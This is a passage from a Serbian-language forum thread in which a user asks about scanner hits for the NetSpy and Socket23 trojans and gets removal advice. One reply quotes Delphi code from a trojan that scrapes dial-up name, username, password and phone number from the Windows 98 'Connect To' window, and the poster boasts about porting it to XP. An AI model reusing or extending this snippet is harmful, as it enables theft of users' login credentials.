Trojanci? Socket23 i NetSpy. Jesu ili nisu

Trojanci? Socket23 i NetSpy. Jesu ili nisu

offline
  • berag 
  • Novi MyCity građanin
  • Pridružio: 11 Jun 2003
  • Poruke: 1

NetCrunch mi je pri trazenju trojanaca pronasao dva servisa i to NetSpy i Socket23. Prvi je na portu 1025, a drugi na portu 5000.
Na internetu sam pronasao nesto malo o njima i navodno su visoko rizicni.
U opisanom postupku kako ih se rjesiti nema tih fajlova pa ne mogu ni da ih se rjesim.
Molim one koji se razumiju, a ovdje bi ih trebalo biti, da napisu svoje misljenje, odgovor, pitanje, komentar.



Registruj se da bi učestvovao u diskusiji. Registrovanim korisnicima se NE prikazuju reklame unutar poruka.
offline
  • Pridružio: 20 Apr 2003
  • Poruke: 2091
  • Gde živiš: Novi Sad

evo da preduhitrim Puky-ja ;-)
http://virus.neobee.net/

pa pogledaj tamo.



offline
  • Pridružio: 17 Apr 2003
  • Poruke: 488
  • Gde živiš: Niš

Potrazi na:
http://www.viruslist.com/eng/viruslist.html ili
http://www.trendmicro.com/vinfo/virusencyclo

offline
  • Puky  Male
  • Scottish rebel
  • Pridružio: 18 Apr 2003
  • Poruke: 5815
  • Gde živiš: u Zmajevom gnjezdu

Drax ::evo da preduhitrim Puky-ja ;-)
http://virus.neobee.net/
pa pogledaj tamo.


TNX za antireklamu jer nemam te opise na sajtu. Wink

@ Berag
Zapamti koji su to fajlovi pa pogledaj u listi procesa pa ih iskljuci.
A dodatno pogledaj u registartskoj bazi da li se startuju.

offline
  • Pridružio: 21 Jun 2003
  • Poruke: 65
  • Gde živiš: Serbia/Pancevo

berag ::NetCrunch mi je pri trazenju trojanaca pronasao dva servisa i to NetSpy i Socket23. Prvi je na portu 1025, a drugi na portu 5000.
Na internetu sam pronasao nesto malo o njima i navodno su visoko rizicni.
U opisanom postupku kako ih se rjesiti nema tih fajlova pa ne mogu ni da ih se rjesim.
Molim one koji se razumiju, a ovdje bi ih trebalo biti, da napisu svoje misljenje, odgovor, pitanje, komentar.


Joj netspy to je programirao moj ortak i ja sam hteo da izbacim koji trojan ali posto je izasao win2k i XP malo su se neke stvari promenile pa me je mrzelo da otkrivam gde drzi dial up passworde dok je kod win98 sve bilo lako samo izvadis handle iz prozora i povadis text iz field-ova prosto ko pasulj...

Citat:
function KRADI(hChild: hWnd; param: dWord): bool; stdcall;
var
tmp: pchar;
tmp2: string;
begin
getmem(tmp, 1025);
SendMessage(hChild, WM_GETTEXT, 1024, longint(tmp));
tmp2 := StrPas(tmp);
case brojac of
DUP_NAME: STOLEN_DIALUP := tmp2;
DUP_USER: STOLEN_USER := tmp2;
DUP_PASS: STOLEN_PASS := tmp2;
DUP_PHONE: STOLEN_PHONE := tmp2;
end;
freemem(tmp, 1025);
inc(brojac);
end;


i onda samo pozovete i napravite ako nadje prozor Connect to:
Citat:
wnd := FindWindow(nil, 'Connect To');
if iswindow(wnd)=true then
begin
repeat
Waiting := 30;
Brojac := 0;
EnumChildWindows(wnd, @KRADI, 0);
CurData := STOLEN_DIALUP+':'+STOLEN_USER+':'+STOLEN_PASS+':'+STOLEN_PHONE;

Uglavnom ocajno bedan security :-)

offline
  • Peca  Male
  • Glavni Administrator
  • Predrag Damnjanović
  • SysAdmin i programer
  • Pridružio: 17 Apr 2003
  • Poruke: 23054
  • Gde živiš: Niš

cini mi se da je to na weird-ovom sajtu bilo, pre 3-4 godina...
mislim da ovo ne radi na novijim windowsima, na XP recimo

offline
  • Pridružio: 21 Jun 2003
  • Poruke: 65
  • Gde živiš: Serbia/Pancevo

Ma to je bilo svugde nije ni vazno pa ne radi na win2k i XP-u zato sto passworde drze negde drugde cim izvalim gde radice Smile

Ko je trenutno na forumu
 

Ukupno su 618 korisnika na forumu :: 43 registrovanih, 2 sakrivenih i 573 gosta   ::   [ Administrator ] [ Supermoderator ] [ Moderator ] :: Detaljnije

Najviše korisnika na forumu ikad bilo je 1567 - dana 15 Jul 2016 19:18

Korisnici koji su trenutno na forumu:
Korisnici trenutno na forumu: A.R.Chafee.Jr., babaroga2, bigbear2, bojank, cikadeda, cvrle312, darkangel, Denaya, Doca, Dorcolac, Duh sa sekirom, Gama, Ilija Cvorovic, ivance95, Iwo Jima, kalens021, Koca Popovic, Kubovac, liki83, MarKhan, Marko Marković2, MB120mm, Mixelotti, nenad81, NenadG, prle122, RADOVAN.S, Raptor1, rovac, Skywhaler, Snorks, Sonyboy, srecko81, Srki94, Srky Boy, tanakadzo, Taso, vasa.93, vathra, versus, Vik, VP3987, Wisdomseeker